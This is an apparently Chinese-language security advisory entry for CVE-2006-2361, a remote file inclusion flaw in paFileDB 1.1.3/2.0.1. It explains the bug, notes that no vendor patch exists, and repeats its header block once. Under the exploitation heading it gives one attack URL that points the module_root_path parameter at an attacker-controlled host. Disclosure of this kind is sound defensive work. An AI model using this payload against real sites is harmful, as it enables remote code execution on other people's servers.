paFileDB pafiledb_constants.php远程文件包含漏洞
添加时间:
2008-10-03
系统编号:
WAVDB-00940
BugCVE: CVE-2006-2361
BUGTRAQ: 17930
影响版本:
paFileDB 1.1.3/2.0.1
程序介绍:
2008-10-03
系统编号:
WAVDB-00940
BugCVE: CVE-2006-2361
BUGTRAQ: 17930
影响版本:
paFileDB 1.1.3/2.0.1
程序介绍:
paFileDB是一款文件管理脚本,允许版主管理站点下载文件数据库,还可以编辑和删除文件。
漏洞分析:
paFileDB在处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。
paFileDB的pafiledb_constants.php脚本没有正确验证 module_root_path=http:// 参数的输入,允许攻击者通过包含本地或外部资源的任意文件导致执行任意代码。
漏洞利用:
http://www.site.com/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]
解决方案:
厂商补丁:
paFileDB
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phparena.net